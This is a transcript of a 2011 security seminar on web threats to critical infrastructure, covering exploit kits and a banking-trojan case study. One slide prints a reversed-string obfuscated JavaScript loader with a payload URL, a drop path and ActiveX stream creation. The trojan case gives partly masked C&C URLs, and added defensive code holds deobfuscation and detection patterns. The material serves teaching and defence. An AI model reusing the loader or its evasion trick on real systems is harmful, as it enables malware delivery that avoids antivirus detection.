Protect critical infrastructure by Patrick de Jong
DESCRIPTION
Seminar by Patrick de Jong during Infosecurity.be 2011
TRANSCRIPT
Protecting your critical infrastructure against web threats
Agenda:
• Critical infrastructure / web threats relation
• What are we facing (some statistics) and why
• Spreading the malware
• How do ‘they’ stay undetected?
• What harm can ‘they’ do?
• An example (Phoenix + Banker trojan)
• The message of the photo (opening slide)
Critical infrastructure – Web threats?
Digitized (remote) control based on a standard OS like Windows or Linux and using standard Ethernet, TCP/IP. ‘Everything’ got connected.
Proprietary boxes with push buttons and switches, without any networking/connectivity (later with proprietary OS and networks).
Critical infrastructure – Web threats
Web-based threats
Some statistics (what are we facing)
• 92% of new threats come from the Web
• 671% increase in Web malware* over 2008
• 79.9% of Web malware comes from legitimate sites**
* AV-test currently (01-2011) counted 50 million samples
** Source: Websense
Some statistics (what are we facing)
[Slide figure: Web 2.0 landscape – Social Networking, Enterprise SaaS, Collaboration Tools, Client Applications, Social Media, Media Sharing, Interactive Sharing, Mass Comms]
• Under 40% current AV catch rates*
• 52% of malware dead within 24 hours**
• 10 billion world-wide blended threat emails per day
* Source: M86 Security Labs
** Source: Panda Labs
Why? Driven by money. Just as professional as commercial software
Why? Driven by money. Joint venture toolkits
Why? Driven by money. Data selling
Why? Mostly driven by money. Buying & selling ‘victims’
Spreading the malware – email spam and malicious websites
Spreading the malware – malware distribution via legitimate websites (stolen FTP or hack)
• Attacker benefits from someone else’s traffic and reputation
• Designed to defeat URL filtering & reputation software
• Most malware is now spread via compromised legitimate sites
How ‘they’ stay undetected
How they stay undetected – Evasive techniques
How they stay undetected – Evasive techniques behind the scenes
How they stay undetected – Code obfuscation
// Obfuscated loader as shown on the slide: every string is stored reversed, and
// RE() turns it back with RV() before handing it to eval(), so no readable
// keyword (object name, CLSID, URL) appears in the file as scanned.
var fname = "C:\\mssync20.exe";                              // drop location for the payload
var url = RV("1=edom?php.ssr/2ssr/moc.enilnolanosrep-vt.www//:ptth"); // reversed payload URL
RE("");                                                      // empty probe: eval("") does nothing
var _r = RE(";)'tcejbo'(tnemelEetaerc.tnemucod");           // reversed: creates an <object> element
RE(";)'r_','di'(etubirttAtes.r_");                           // reversed: sets its id attribute
RE(";)'63E92CF40C00-A389-0D11-3A56-655C69DB:dislc','dissalc'(etubirttAtes.r_"); // reversed: sets a CLSID as classid
var is_ok = 0;
try
{
  var _s = RE(";)'','maerts.bdoda'(tcejbOetaerC.r_");       // reversed: instantiates a stream object via the <object>
  is_ok = 1;
}
catch(e){}
if (is_ok != 1)
{
  try
  {
    var _s = RE(";)'maerts.bdoda'(tcejbOXevitcA wen");       // reversed: fallback through ActiveXObject
    is_ok = 1;
  }
  catch(e){}
}
function RE(s) { return eval(RV(s)); }   // reverse, then execute
function RV(s)                            // plain string reversal is the whole "encoding"
{
  var rev = "";
  for (var i = 0; i < s.length; i++)
  {
    rev = s.charAt(i) + rev;
  }
  return rev;
}
Reversed malicious code – undetected! ‘Actual’ malicious code – detected (7 out of 31)
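An added example (not from the slides or the speaker): a static deobfuscator for the reverse-then-eval pattern shown above. Instead of running the script, it extracts every string literal passed to the RE()/RV() helpers, reverses it to show what eval() would receive, and flags the decoded statements that touch risky objects. The sample input is constructed with a hypothetical host; the helper names RE/RV are the ones the slide uses.

```javascript
// Reverse a string exactly as the loader's RV() does.
function reverseString(s) {
  return s.split("").reverse().join("");
}

// Match RE("...") / RV("...") calls with a single- or double-quoted literal
// (no escaped quotes inside the literal, which is all the slide's sample needs).
const HELPER_CALL = /\b(RE|RV)\(\s*(["'])((?:(?!\2).)*)\2\s*\)/g;

// Return one record per helper call: which helper, the stored literal, and
// the reversed text that eval() would actually execute.
function decodeReversedCalls(script) {
  const decoded = [];
  let m;
  while ((m = HELPER_CALL.exec(script)) !== null) {
    const [, helper, , literal] = m;
    if (literal.length === 0) continue; // RE("") is a no-op probe, nothing to show
    decoded.push({ helper, original: literal, decoded: reverseString(literal) });
  }
  return decoded;
}

// Triage: keep only decoded statements that instantiate COM/ActiveX objects,
// reference a CLSID, or carry a URL (the things signatures look for).
const RISKY = [/ActiveXObject/i, /adodb\.stream/i, /\.CreateObject\(/i, /clsid:/i, /https?:\/\//i];
function flagRisky(entries) {
  return entries.filter((e) => RISKY.some((rx) => rx.test(e.decoded)));
}

// Constructed sample (not the slide's actual payload): same structure,
// hypothetical host example.invalid instead of the real one.
const SAMPLE = [
  'var url = RV("exe.daolyap/dilavni.elpmaxe//:ptth");',
  'RE("");',
  'var _r = RE(";)\'tcejbo\'(tnemelEetaerc.tnemucod");',
  'var _s = RE(";)\'maerts.bdoda\'(tcejbOXevitcA wen");',
].join("\n");

// Usage: decode the sample and list what an AV engine never gets to see as-is.
for (const e of flagRisky(decodeReversedCalls(SAMPLE))) {
  console.log(`${e.helper}: ${e.decoded}`);
}
```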
How they stay undetected – Code obfuscation
How they stay undetected – Dynamic code obfuscation
How they stay undetected – Private exploit encryption
NeoSploit infection process:
1. … <malicious IFRAME> …
2. Generating obfuscated JS
3. Generating a key and sending it to the server
4. Using the key to generate an encrypted script that is sent back to the client
5. The browser opens the encrypted script with the key and executes the JS code
Toolkits/Trojans/C&C – What can they do with it
Example: banking trojan – Money mules
Example: banking trojan
Using stolen FTP accounts, the cyber gang managed to inject an iframe that leads to the Phoenix Exploit Kit on thousands of legitimate websites.
The user accesses a compromised website. The website content contains a redirection to the Phoenix Exploit Kit.
Example: banking trojan
The user accesses a compromised website and is redirected to the Phoenix Exploit Kit 2.3:
http://fan******.net/.ph/5
The user’s PC is exploited, and the payload is downloaded successfully.
Example: banking trojan
The malware downloads a configuration file from:
hxxp://uste*****.com.tr/Scripts/rd.bin
This specific configuration file contains injection orders that will be used when the user accesses the bank.
The gang doesn’t want to uncover the main C&C to the world and uses the Exploit Kit server as a proxy to the main C&C server.
Example: banking trojan
Before the Trojan accesses the Command & Control server it verifies that the user’s PC is connected to the internet:
http://google.com/webhp
After a successful connection test, the bot reports the new installation to the C&C server at:
hxxp://195.***.**.147:3128/data/set.php
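An added example (not from the slides or the speaker): a proxy-log heuristic for the check-in sequence just described, where a benign connectivity probe is followed within seconds by a report to a C&C reached by bare IP address and explicit port. The log format, the sample lines and the 192.0.2.10 address are constructed; the probe host and the bare-IP:port pattern are the ones the slide shows.

```javascript
// Hosts the slide shows being used as a connectivity probe before C&C contact.
const PROBE_HOSTS = new Set(["google.com", "www.google.com"]);
// A URL whose host is a literal IPv4 address with an explicit port (e.g. :3128).
const BARE_IP_WITH_PORT = /^https?:\/\/(\d{1,3}(?:\.\d{1,3}){3}):(\d+)\//;

// Constructed log format: "<ISO timestamp> <client> <method> <url>".
function parseLine(line) {
  const [ts, client, method, url] = line.trim().split(/\s+/);
  return { ts: Date.parse(ts), client, method, url, host: new URL(url).hostname };
}

// For each client, report every bare-IP:port request that follows a probe
// within windowMs; each hit carries the probe URL, the C&C endpoint and path.
function findCheckins(lines, windowMs = 60000) {
  const byClient = new Map();
  for (const rec of lines.map(parseLine)) {
    if (!byClient.has(rec.client)) byClient.set(rec.client, []);
    byClient.get(rec.client).push(rec);
  }
  const hits = [];
  for (const [client, recs] of byClient) {
    recs.sort((a, b) => a.ts - b.ts);
    for (let i = 0; i < recs.length; i++) {
      if (!PROBE_HOSTS.has(recs[i].host)) continue;
      for (let j = i + 1; j < recs.length && recs[j].ts - recs[i].ts <= windowMs; j++) {
        const m = BARE_IP_WITH_PORT.exec(recs[j].url);
        if (m) {
          hits.push({ client, probe: recs[i].url, c2: `${m[1]}:${m[2]}`, path: new URL(recs[j].url).pathname });
        }
      }
    }
  }
  return hits;
}

// Constructed sample log: one infected client (10.0.0.5) and one clean client (10.0.0.7).
const SAMPLE_LOG = [
  "2011-03-01T10:00:01Z 10.0.0.5 GET http://www.example.invalid/news",
  "2011-03-01T10:00:05Z 10.0.0.5 GET http://google.com/webhp",
  "2011-03-01T10:00:06Z 10.0.0.5 POST http://192.0.2.10:3128/data/set.php",
  "2011-03-01T10:00:09Z 10.0.0.7 GET http://google.com/webhp",
  "2011-03-01T10:05:00Z 10.0.0.7 GET http://www.example.invalid/mail",
];

for (const h of findCheckins(SAMPLE_LOG)) {
  console.log(`${h.client}: probe ${h.probe} then C&C ${h.c2}${h.path}`);
}
```

A probe alone is normal traffic; the signal is the pairing with a direct-to-IP request on a non-standard port, so tune the window to the latency seen in your own proxy logs.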
Example: banking trojan
Besides the banker Trojan, the server sends the user another malware – fake AV. The gang operates in multiple vectors; using social engineering it tries to convince the user to buy the fake AV.
Example: banking trojan
The Trojan adds a script (on the client side) to every page in the website. Of course the script is not located on the server, and the user is redirected to the C&C to download it:
hxxp://cheap********card.info/brap/bscript.js
The Trojan holds until the user accesses the bank. From that point the Trojan supervises all user activity with the bank.
Example: banking trojan
The moment the user tries to commit a transaction, the bot communicates with the C&C and receives full information about the new transaction that the bot is intending to commit. The bot replaces the details in the ‘transaction submit form’ and sends it to the server.
Example: banking trojan
An example of a successful transaction generated by the Trojan to the money mule account.
Web-based vulnerability: the (mobile) user
• Roams between various ISPs:
– Wi-Fi at airport and hotel
– Home office
– Other
• No web security policy protection when off the corporate network
• Readily infected by compromised legitimate sites
• Reconnects to corporate networks after trips
• Brings potential malware back into the organisation’s network
The photo
1. Evading dubious sites is key to keeping malware out?
2. Websites with a good reputation won’t infect you?
3. As long as your AV is updated there is nothing to worry about?
4. Protecting the end-user workstation is very important when protecting your critical security infrastructure?
Patrick de Jong
Sales Engineer Northern Europe
Phone: +31 33 454 3533
Mobile: +31 6 1373 2964
Email: [email protected]